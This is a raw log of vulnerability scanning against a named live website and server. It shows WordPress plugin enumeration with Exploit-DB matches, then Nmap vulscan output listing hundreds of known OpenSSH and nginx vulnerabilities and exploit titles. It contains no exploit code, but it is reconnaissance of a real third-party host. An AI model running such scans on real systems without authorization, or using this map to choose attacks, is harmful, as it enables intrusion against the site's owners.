4512[I] http://models-fashion.net/wp-content/themes/twentythirteen/genericons/README.txt
4513[I] http://models-fashion.net/wp-includes/ID3/license.commercial.txt
4514[I] http://models-fashion.net/wp-includes/ID3/license.txt
4515[I] http://models-fashion.net/wp-includes/ID3/readme.txt
4516[I] http://models-fashion.net/wp-includes/images/crystal/license.txt
4517[I] http://models-fashion.net/wp-includes/js/plupload/license.txt
4518[I] http://models-fashion.net/wp-includes/js/swfupload/license.txt
4519[I] http://models-fashion.net/wp-includes/js/tinymce/license.txt
4520[-] Searching Wordpress Plugins ...
4521[I] add-to-any
4522[I] akismet
4523[M] EDB-ID: 37826 "WordPress 3.4.2 - Multiple Path Disclosure Vulnerabilities"
4524[M] EDB-ID: 37902 "WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities"
4525[I] feed
4526[M] EDB-ID: 38624 "WordPress Plugin WP Feed - 'nid' SQL Injection"
4527[I] wp-pagenavi v2.86
4528[I] wp-spamshield
4529[I] yet-another-related-posts-plugin v4.2.4
4530[I] Checking for Directory Listing Enabled ...
4531[-] Date & Time: 31/03/2020 17:52:02
4532[-] Completed in: 0:04:08
4533######################################################################################################################
4534Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 18:12 EDT
4535Nmap scan report for vm201114.melbi.space (213.183.63.253)
4536Host is up (0.14s latency).
4537Not shown: 995 closed ports
4538PORT STATE SERVICE VERSION
453922/tcp open ssh OpenSSH 7.4 (protocol 2.0)
4540| vulscan: VulDB - https://vuldb.com:
4541| [130671] gsi-openssh-server 7.9p1 on Fedora /etc/gsissh/sshd_config weak authentication
4542| [130371] OpenSSH 7.9 scp Man-in-the-Middle directory traversal
4543| [130370] OpenSSH 7.9 Man-in-the-Middle spoofing
4544| [130369] OpenSSH 7.9 Encoding progressmeter.c refresh_progress_meter() spoofing
4545| [129007] OpenSSH 7.9 scp Client scp.c Filename privilege escalation
4546| [123343] OpenSSH up to 7.8 GSS2 auth-gss2.c information disclosure
4547| [123011] OpenSSH up to 7.7 auth2-gss.c Request information disclosure
4548| [112267] OpenSSH up to 7.3 sshd kex.c/packet.c NEWKEYS Message denial of service
4549| [108627] OpenSSH up to 7.5 Readonly Mode sftp-server.c process_open unknown vulnerability
4550| [94611] OpenSSH up to 7.3 Access Control privilege escalation
4551| [94610] OpenSSH up to 7.3 Shared Memory Manager privilege escalation
4552| [94608] OpenSSH up to 7.3 Unix-Domain Socket privilege escalation
4553| [94607] OpenSSH up to 7.3 Forwarded Agent Channel privilege escalation
4554| [90671] OpenSSH up to 7.2 auth-passwd.c auth_password denial of service
4555| [90405] OpenSSH up to 7.2p2 sshd information disclosure
4556| [90404] OpenSSH up to 7.2p2 sshd information disclosure
4557| [90403] OpenSSH up to 7.2p2 sshd CPU Exhaustion denial of service
4558| [89622] OpenSSH 7.2p2 Authentication Username information disclosure
4559| [81320] OpenSSH up to 7.2p1 X11 Authentication Credential xauth privilege escalation
4560| [80656] OpenBSD OpenSSH 7.1 X11 Forwarding privilege escalation
4561| [80330] OpenSSH up to 7.1p1 packet.c ssh_packet_read_poll2 memory corruption
4562|
4563| MITRE CVE - https://cve.mitre.org:
4564| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
4565| [CVE-1999-0661] A system is running a version of software that was replaced with a Trojan Horse at one of its distribution points, such as (1) TCP Wrappers 7.6, (2) util-linux 2.9g, (3) wuarchive ftpd (wuftpd) 2.2 and 2.1f, (4) IRC client (ircII) ircII 2.2.9, (5) OpenSSH 3.4p1, or (6) Sendmail 8.12.6.
4566|
4567| SecurityFocus - https://www.securityfocus.com/bid/:
4568| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
4569| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
4570| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
4571| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
4572| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
4573| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
4574| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
4575| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
4576| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
4577| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
4578| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
4579| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
4580| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
4581| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
4582| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
4583| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
4584| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
4585| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
4586| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
4587| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
4588| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
4589| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
4590| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
4591| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
4592| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
4593| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
4594| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
4595| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
4596| [75990] OpenSSH Login Handling Security Bypass Weakness
4597| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
4598| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
4599| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
4600| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
4601| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
4602| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
4603| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
4604| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
4605| [61286] OpenSSH Remote Denial of Service Vulnerability
4606| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
4607| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
4608| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
4609| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
4610| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
4611| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
4612| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
4613| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
4614| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
4615| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
4616| [36552] Red Hat Enterprise Linux OpenSSH 'ChrootDirectory' Option Local Privilege Escalation Vulnerability
4617| [32319] OpenSSH CBC Mode Information Disclosure Vulnerability
4618| [30794] Red Hat OpenSSH Backdoor Vulnerability
4619| [30339] OpenSSH 'X11UseLocalhost' X11 Forwarding Session Hijacking Vulnerability
4620| [30276] Debian OpenSSH SELinux Privilege Escalation Vulnerability
4621| [28531] OpenSSH ForceCommand Command Execution Weakness
4622| [28444] OpenSSH X Connections Session Hijacking Vulnerability
4623| [26097] OpenSSH LINUX_AUDIT_RECORD_EVENT Remote Log Injection Weakness
4624| [25628] OpenSSH X11 Cookie Local Authentication Bypass Vulnerability
4625| [23601] OpenSSH S/Key Remote Information Disclosure Vulnerability
4626| [20956] OpenSSH Privilege Separation Key Signature Weakness
4627| [20418] OpenSSH-Portable Existing Password Remote Information Disclosure Weakness
4628| [20245] OpenSSH-Portable GSSAPI Authentication Abort Information Disclosure Weakness
4629| [20241] Portable OpenSSH GSSAPI Remote Code Execution Vulnerability
4630| [20216] OpenSSH Duplicated Block Remote Denial of Service Vulnerability
4631| [16892] OpenSSH Remote PAM Denial Of Service Vulnerability
4632| [14963] OpenSSH LoginGraceTime Remote Denial Of Service Vulnerability
4633| [14729] OpenSSH GSSAPI Credential Disclosure Vulnerability
4634| [14727] OpenSSH DynamicForward Inadvertent GatewayPorts Activation Vulnerability
4635| [11781] OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
4636| [9986] RCP, OpenSSH SCP Client File Corruption Vulnerability
4637| [9040] OpenSSH PAM Conversation Memory Scrubbing Weakness
4638| [8677] Multiple Portable OpenSSH PAM Vulnerabilities
4639| [8628] OpenSSH Buffer Mismanagement Vulnerabilities
4640| [7831] OpenSSH Reverse DNS Lookup Access Control Bypass Vulnerability
4641| [7482] OpenSSH Remote Root Authentication Timing Side-Channel Weakness
4642| [7467] OpenSSH-portable Enabled PAM Delay Information Disclosure Vulnerability
4643| [7343] OpenSSH Authentication Execution Path Timing Information Leakage Weakness
4644| [6168] OpenSSH Visible Password Vulnerability
4645| [5374] OpenSSH Trojan Horse Vulnerability
4646| [5093] OpenSSH Challenge-Response Buffer Overflow Vulnerabilities
4647| [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
4648| [4241] OpenSSH Channel Code Off-By-One Vulnerability
4649| [3614] OpenSSH UseLogin Environment Variable Passing Vulnerability
4650| [3560] OpenSSH Kerberos Arbitrary Privilege Elevation Vulnerability
4651| [3369] OpenSSH Key Based Source IP Access Control Bypass Vulnerability
4652| [3345] OpenSSH SFTP Command Restriction Bypassing Vulnerability
4653| [2917] OpenSSH PAM Session Evasion Vulnerability
4654| [2825] OpenSSH Client X11 Forwarding Cookie Removal File Symbolic Link Vulnerability
4655| [2356] OpenSSH Private Key Authentication Check Vulnerability
4656| [1949] OpenSSH Client Unauthorized Remote Forwarding Vulnerability
4657| [1334] OpenSSH UseLogin Vulnerability
4658|
4659| IBM X-Force - https://exchange.xforce.ibmcloud.com:
4660| [83258] GSI-OpenSSH auth-pam.c security bypass
4661| [82781] OpenSSH time limit denial of service
4662| [82231] OpenSSH pam_ssh_agent_auth PAM code execution
4663| [74809] OpenSSH ssh_gssapi_parse_ename denial of service
4664| [72756] Debian openssh-server commands information disclosure
4665| [68339] OpenSSH pam_thread buffer overflow
4666| [67264] OpenSSH ssh-keysign unauthorized access
4667| [65910] OpenSSH remote_glob function denial of service
4668| [65163] OpenSSH certificate information disclosure
4669| [64387] OpenSSH J-PAKE security bypass
4670| [63337] Cisco Unified Videoconferencing OpenSSH weak security
4671| [46620] OpenSSH and multiple SSH Tectia products CBC mode information disclosure
4672| [45202] OpenSSH signal handler denial of service
4673| [44747] RHEL OpenSSH backdoor
4674| [44280] OpenSSH PermitRootLogin information disclosure
4675| [44279] OpenSSH sshd weak security
4676| [44037] OpenSSH sshd SELinux role unauthorized access
4677| [43940] OpenSSH X11 forwarding information disclosure
4678| [41549] OpenSSH ForceCommand directive security bypass
4679| [41438] OpenSSH sshd session hijacking
4680| [40897] OpenSSH known_hosts weak security
4681| [40587] OpenSSH username weak security
4682| [37371] OpenSSH username data manipulation
4683| [37118] RHSA update for OpenSSH privilege separation monitor authentication verification weakness not installed
4684| [37112] RHSA update for OpenSSH signal handler race condition not installed
4685| [37107] RHSA update for OpenSSH identical block denial of service not installed
4686| [36637] OpenSSH X11 cookie privilege escalation
4687| [35167] OpenSSH packet.c newkeys[mode] denial of service
4688| [34490] OpenSSH OPIE information disclosure
4689| [33794] OpenSSH ChallengeResponseAuthentication information disclosure
4690| [32975] Apple Mac OS X OpenSSH denial of service
4691| [32387] RHSA-2006:0738 updates for openssh not installed
4692| [32359] RHSA-2006:0697 updates for openssh not installed
4693| [32230] RHSA-2006:0298 updates for openssh not installed
4694| [32132] RHSA-2006:0044 updates for openssh not installed
4695| [30120] OpenSSH privilege separation monitor authentication verification weakness
4696| [29255] OpenSSH GSSAPI user enumeration
4697| [29254] OpenSSH signal handler race condition
4698| [29158] OpenSSH identical block denial of service
4699| [28147] Apple Mac OS X OpenSSH nonexistent user login denial of service
4700| [25116] OpenSSH OpenPAM denial of service
4701| [24305] OpenSSH SCP shell expansion command execution
4702| [22665] RHSA-2005:106 updates for openssh not installed
4703| [22117] OpenSSH GSSAPI allows elevated privileges
4704| [22115] OpenSSH GatewayPorts security bypass
4705| [20930] OpenSSH sshd.c LoginGraceTime denial of service
4706| [19441] Sun Solaris OpenSSH LDAP (1) client authentication denial of service
4707| [17213] OpenSSH allows port bouncing attacks
4708| [16323] OpenSSH scp file overwrite
4709| [13797] OpenSSH PAM information leak
4710| [13271] OpenSSH could allow an attacker to corrupt the PAM conversion stack
4711| [13264] OpenSSH PAM code could allow an attacker to gain access
4712| [13215] OpenSSH buffer management errors could allow an attacker to execute code
4713| [13214] OpenSSH memory vulnerabilities
4714| [13191] OpenSSH large packet buffer overflow
4715| [12196] OpenSSH could allow an attacker to bypass login restrictions
4716| [11970] OpenSSH could allow an attacker to obtain valid administrative account
4717| [11902] OpenSSH PAM support enabled information leak
4718| [9803] OpenSSH "
4719| [9763] OpenSSH downloaded from the OpenBSD FTP site or OpenBSD FTP mirror sites could contain a Trojan Horse
4720| [9307] OpenSSH is running on the system
4721| [9169] OpenSSH "
4722| [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
4723| [8697] FreeBSD libutil in OpenSSH fails to drop privileges prior to using the login class capability database
4724| [8383] OpenSSH off-by-one error in channel code
4725| [7647] OpenSSH UseLogin option arbitrary code execution
4726| [7634] OpenSSH using sftp and restricted keypairs could allow an attacker to bypass restrictions
4727| [7598] OpenSSH with Kerberos allows attacker to gain elevated privileges
4728| [7179] OpenSSH source IP access control bypass
4729| [6757] OpenSSH "
4730| [6676] OpenSSH X11 forwarding symlink attack could allow deletion of arbitrary files
4731| [6084] OpenSSH 2.3.1 allows remote users to bypass authentication
4732| [5517] OpenSSH allows unauthorized access to resources
4733| [4646] OpenSSH UseLogin option allows remote users to execute commands as root
4734|
4735| Exploit-DB - https://www.exploit-db.com:
4736| [21579] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (2)
4737| [21578] OpenSSH 3.x Challenge-Response Buffer Overflow Vulnerabilities (1)
4738| [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
4739| [21314] OpenSSH 2.x/3.0.1/3.0.2 Channel Code Off-By-One Vulnerability
4740| [20253] OpenSSH 1.2 scp File Create/Overwrite Vulnerability
4741| [17462] FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
4742| [14866] Novell Netware 6.5 - OpenSSH Remote Stack Overflow
4743| [6094] Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
4744| [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
4745| [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
4746| [1572] Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
4747| [258] glibc-2.2 and openssh-2.3.0p1 exploits glibc => 2.1.9x
4748| [26] OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh)
4749| [25] OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool
4750|
4751| OpenVAS (Nessus) - http://www.openvas.org:
4752| [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
4753| [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
4754| [881183] CentOS Update for openssh CESA-2012:0884 centos6
4755| [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
4756| [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
4757| [870763] RedHat Update for openssh RHSA-2012:0884-04
4758| [870129] RedHat Update for openssh RHSA-2008:0855-01
4759| [861813] Fedora Update for openssh FEDORA-2010-5429
4760| [861319] Fedora Update for openssh FEDORA-2007-395
4761| [861170] Fedora Update for openssh FEDORA-2007-394
4762| [861012] Fedora Update for openssh FEDORA-2007-715
4763| [840345] Ubuntu Update for openssh vulnerability USN-597-1
4764| [840300] Ubuntu Update for openssh update USN-612-5
4765| [840271] Ubuntu Update for openssh vulnerability USN-612-2
4766| [840268] Ubuntu Update for openssh update USN-612-7
4767| [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
4768| [840214] Ubuntu Update for openssh vulnerability USN-566-1
4769| [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
4770| [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
4771| [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
4772| [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
4773| [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
4774| [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
4775| [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
4776| [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
4777| [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
4778| [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
4779| [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
4780| [100584] OpenSSH X Connections Session Hijacking Vulnerability
4781| [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
4782| [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
4783| [65987] SLES10: Security update for OpenSSH
4784| [65819] SLES10: Security update for OpenSSH
4785| [65514] SLES9: Security update for OpenSSH
4786| [65513] SLES9: Security update for OpenSSH
4787| [65334] SLES9: Security update for OpenSSH
4788| [65248] SLES9: Security update for OpenSSH
4789| [65218] SLES9: Security update for OpenSSH
4790| [65169] SLES9: Security update for openssh,openssh-askpass
4791| [65126] SLES9: Security update for OpenSSH
4792| [65019] SLES9: Security update for OpenSSH
4793| [65015] SLES9: Security update for OpenSSH
4794| [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
4795| [61639] Debian Security Advisory DSA 1638-1 (openssh)
4796| [61030] Debian Security Advisory DSA 1576-2 (openssh)
4797| [61029] Debian Security Advisory DSA 1576-1 (openssh)
4798| [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
4799| [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
4800| [60667] Slackware Advisory SSA:2008-095-01 openssh
4801| [59014] Slackware Advisory SSA:2007-255-01 openssh
4802| [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
4803| [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
4804| [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
4805| [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
4806| [57492] Slackware Advisory SSA:2006-272-02 openssh
4807| [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
4808| [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
4809| [57470] FreeBSD Ports: openssh
4810| [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
4811| [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
4812| [56294] Slackware Advisory SSA:2006-045-06 openssh
4813| [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
4814| [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
4815| [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
4816| [53788] Debian Security Advisory DSA 025-1 (openssh)
4817| [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
4818| [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
4819| [11343] OpenSSH Client Unauthorized Remote Forwarding
4820| [10954] OpenSSH AFS/Kerberos ticket/token passing
4821| [10883] OpenSSH Channel Code Off by 1
4822| [10823] OpenSSH UseLogin Environment Variables
4823|
4824| SecurityTracker - https://www.securitytracker.com:
4825| [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
4826| [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
4827| [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
4828| [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
4829| [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
4830| [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
4831| [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
4832| [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
4833| [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
4834| [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
4835| [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
4836| [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
4837| [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
4838| [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
4839| [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
4840| [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
4841| [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
4842| [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
4843| [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
4844| [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
4845| [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
4846| [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
4847| [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
4848| [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
4849| [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
4850| [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
4851| [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
4852| [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
4853| [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
4854| [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
4855| [1004115] OpenSSH Buffer Overflow in Kerberos Ticket and AFS Token Processing Lets Local Users Execute Arbitrary Code With Root Level Permissions
4856| [1003758] OpenSSH Off-by-one 'Channels' Bug May Let Authorized Remote Users Execute Arbitrary Code with Root Privileges
4857| [1002895] OpenSSH UseLogin Environment Variable Bug Lets Local Users Execute Commands and Gain Root Access
4858| [1002748] OpenSSH 3.0 Denial of Service Condition May Allow Remote Users to Crash the sshd Daemon and KerberosV Configuration Error May Allow Remote Users to Partially Authenticate When Authentication Should Not Be Permitted
4859| [1002734] OpenSSH's S/Key Implementation Information Disclosure Flaw Provides Remote Users With Information About Valid User Accounts
4860| [1002455] OpenSSH May Fail to Properly Restrict IP Addresses in Certain Configurations
4861| [1002432] OpenSSH's Sftp-server Subsystem Lets Authorized Remote Users with Restricted Keypairs Obtain Additional Access on the Server
4862| [1001683] OpenSSH Allows Authorized Users to Delete Other User Files Named Cookies
4863|
4864| OSVDB - http://www.osvdb.org:
4865| [92034] GSI-OpenSSH auth-pam.c Memory Management Authentication Bypass
4866| [90474] Red Hat / Fedora PAM Module for OpenSSH Incorrect error() Function Calling Local Privilege Escalation
4867| [90007] OpenSSH logingracetime / maxstartup Threshold Connection Saturation Remote DoS
4868| [81500] OpenSSH gss-serv.c ssh_gssapi_parse_ename Function Field Length Value Parsing Remote DoS
4869| [78706] OpenSSH auth-options.c sshd auth_parse_options Function authorized_keys Command Option Debug Message Information Disclosure
4870| [75753] OpenSSH PAM Module Aborted Conversation Local Information Disclosure
4871| [75249] OpenSSH sftp-glob.c remote_glob Function Glob Expression Parsing Remote DoS
4872| [75248] OpenSSH sftp.c process_put Function Glob Expression Parsing Remote DoS
4873| [72183] Portable OpenSSH ssh-keysign ssh-rand-helper Utility File Descriptor Leak Local Information Disclosure
4874| [70873] OpenSSH Legacy Certificates Stack Memory Disclosure
4875| [69658] OpenSSH J-PAKE Public Parameter Validation Shared Secret Authentication Bypass
4876| [67743] Novell NetWare OpenSSH SSHD.NLM Absolute Path Handling Remote Overflow
4877| [59353] OpenSSH sshd Local TCP Redirection Connection Masking Weakness
4878| [58495] OpenSSH sshd ChrootDirectory Feature SetUID Hard Link Local Privilege Escalation
4879| [56921] OpenSSH Unspecified Remote Compromise
4880| [53021] OpenSSH on ftp.openbsd.org Trojaned Distribution
4881| [50036] OpenSSH CBC Mode Chosen Ciphertext 32-bit Chunk Plaintext Context Disclosure
4882| [49386] OpenSSH sshd TCP Connection State Remote Account Enumeration
4883| [48791] OpenSSH on Debian sshd Crafted Username Arbitrary Remote SELinux Role Access
4884| [47635] OpenSSH Packages on Red Hat Enterprise Linux Compromised Distribution
4885| [47227] OpenSSH X11UseLocalhost X11 Forwarding Port Hijacking
4886| [45873] Cisco WebNS SSHield w/ OpenSSH Crafted Large Packet Remote DoS
4887| [43911] OpenSSH ~/.ssh/rc ForceCommand Bypass Arbitrary Command Execution
4888| [43745] OpenSSH X11 Forwarding Local Session Hijacking
4889| [43371] OpenSSH Trusted X11 Cookie Connection Policy Bypass
4890| [39214] OpenSSH linux_audit_record_event Crafted Username Audit Log Injection
4891| [37315] pam_usb OpenSSH Authentication Unspecified Issue
4892| [34850] OpenSSH on Mac OS X Key Generation Remote Connection DoS
4893| [34601] OPIE w/ OpenSSH Account Enumeration
4894| [34600] OpenSSH S/KEY Authentication Account Enumeration
4895| [32721] OpenSSH Username Password Complexity Account Enumeration
4896| [30232] OpenSSH Privilege Separation Monitor Weakness
4897| [29494] OpenSSH packet.c Invalid Protocol Sequence Remote DoS
4898| [29266] OpenSSH GSSAPI Authentication Abort Username Enumeration
4899| [29264] OpenSSH Signal Handler Pre-authentication Race Condition Code Execution
4900| [29152] OpenSSH Identical Block Packet DoS
4901| [27745] Apple Mac OS X OpenSSH Nonexistent Account Login Enumeration DoS
4902| [23797] OpenSSH with OpenPAM Connection Saturation Forked Process Saturation DoS
4903| [22692] OpenSSH scp Command Line Filename Processing Command Injection
4904| [20216] OpenSSH with KerberosV Remote Authentication Bypass
4905| [19142] OpenSSH Multiple X11 Channel Forwarding Leaks
4906| [19141] OpenSSH GSSAPIAuthentication Credential Escalation
4907| [18236] OpenSSH no pty Command Execution Local PAM Restriction Bypass
4908| [16567] OpenSSH Privilege Separation LoginGraceTime DoS
4909| [16039] Solaris 108994 Series Patch OpenSSH LDAP Client Authentication DoS
4910| [9562] OpenSSH Default Configuration Anon SSH Service Port Bounce Weakness
4911| [9550] OpenSSH scp Traversal Arbitrary File Overwrite
4912| [6601] OpenSSH *realloc() Unspecified Memory Errors
4913| [6245] OpenSSH SKEY/BSD_AUTH Challenge-Response Remote Overflow
4914| [6073] OpenSSH on FreeBSD libutil Arbitrary File Read
4915| [6072] OpenSSH PAM Conversation Function Stack Modification
4916| [6071] OpenSSH SSHv1 PAM Challenge-Response Authentication Privilege Escalation
4917| [5536] OpenSSH sftp-server Restricted Keypair Restriction Bypass
4918| [5408] OpenSSH echo simulation Information Disclosure
4919| [5113] OpenSSH NIS YP Netgroups Authentication Bypass
4920| [4536] OpenSSH Portable AIX linker Privilege Escalation
4921| [3938] OpenSSL and OpenSSH /dev/random Check Failure
4922| [3456] OpenSSH buffer_append_space() Heap Corruption
4923| [2557] OpenSSH Multiple Buffer Management Multiple Overflows
4924| [2140] OpenSSH w/ PAM Username Validity Timing Attack
4925| [2112] OpenSSH Reverse DNS Lookup Bypass
4926| [2109] OpenSSH sshd Root Login Timing Side-Channel Weakness
4927| [1853] OpenSSH Symbolic Link 'cookies' File Removal
4928| [839] OpenSSH PAMAuthenticationViaKbdInt Challenge-Response Remote Overflow
4929| [781] OpenSSH Kerberos TGT/AFS Token Passing Remote Overflow
4930| [730] OpenSSH Channel Code Off by One Remote Privilege Escalation
4931| [688] OpenSSH UseLogin Environment Variable Local Command Execution
4932| [642] OpenSSH Multiple Key Type ACL Bypass
4933| [504] OpenSSH SSHv2 Public Key Authentication Bypass
4934| [341] OpenSSH UseLogin Local Privilege Escalation
4935|_
493680/tcp open http nginx 1.16.1
4937|_http-server-header: nginx/1.16.1
4938| vulscan: VulDB - https://vuldb.com:
4939| [126525] nginx up to 1.14.0/1.15.5 ngx_http_mp4_module Loop denial of service
4940| [126524] nginx up to 1.14.0/1.15.5 HTTP2 CPU Exhaustion denial of service
4941| [126523] nginx up to 1.14.0/1.15.5 HTTP2 Memory Consumption denial of service
